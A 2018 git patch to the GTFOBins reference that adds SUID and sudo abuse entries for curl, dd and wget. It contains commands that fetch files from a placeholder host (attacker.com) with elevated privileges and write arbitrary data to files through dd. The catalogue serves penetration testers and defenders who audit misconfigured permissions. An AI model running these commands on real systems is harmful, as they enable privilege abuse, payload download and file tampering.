From b016b7b9dd09fd6b8c402c66127bf497aa8b87d4 Mon Sep 17 00:00:00 2001 From: Emilio Pinna Date: Sun, 22 Jul 2018 14:30:03 +0100 Subject: [PATCH] Add suid-enabled and sudo-enabled to curl, dd, and wget --- _gtfobins/curl.md | 12 ++++++++++++ _gtfobins/dd.md | 8 ++++++++ _gtfobins/wget.md | 12 ++++++++++++ 3 files changed, 32 insertions(+) diff --git a/_gtfobins/curl.md b/_gtfobins/curl.md index c14cc1b..ed228e9 100644 --- a/_gtfobins/curl.md +++ b/_gtfobins/curl.md @@ -17,4 +17,16 @@ functions: code: | LFILE=/tmp/file_to_read curl file://$LFILE + suid-enabled: + - description: Fetch a remote file via HTTP GET request. + code: | + URL=http://attacker.com/file_to_get + LFILE=file_to_save + ./curl $URL -o $LFILE + sudo-enabled: + - description: Fetch a remote file via HTTP GET request. + code: | + URL=http://attacker.com/file_to_get + LFILE=file_to_save + sudo -E curl $URL -o $LFILE --- diff --git a/_gtfobins/dd.md b/_gtfobins/dd.md index 192bfc2..c179268 100644 --- a/_gtfobins/dd.md +++ b/_gtfobins/dd.md @@ -8,4 +8,12 @@ functions: - code: | LFILE=file_to_read dd if=LFILE + suid-enabled: + - code: | + LFILE=file_to_write + echo "data" | ./dd of=$LFILE + sudo-enabled: + - code: | + LFILE=file_to_write + echo "data" | sudo -E dd of=$LFILE --- diff --git a/_gtfobins/wget.md b/_gtfobins/wget.md index 1c141e6..659f81e 100644 --- a/_gtfobins/wget.md +++ b/_gtfobins/wget.md @@ -12,4 +12,16 @@ functions: export URL=http://attacker.com/file_to_get export LFILE=file_to_save wget $URL -O $LFILE + suid-enabled: + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + ./wget $URL -O $LFILE + sudo-enabled: + - description: Fetch a remote file via HTTP GET request. + code: | + export URL=http://attacker.com/file_to_get + export LFILE=file_to_save + sudo -E wget $URL -O $LFILE ---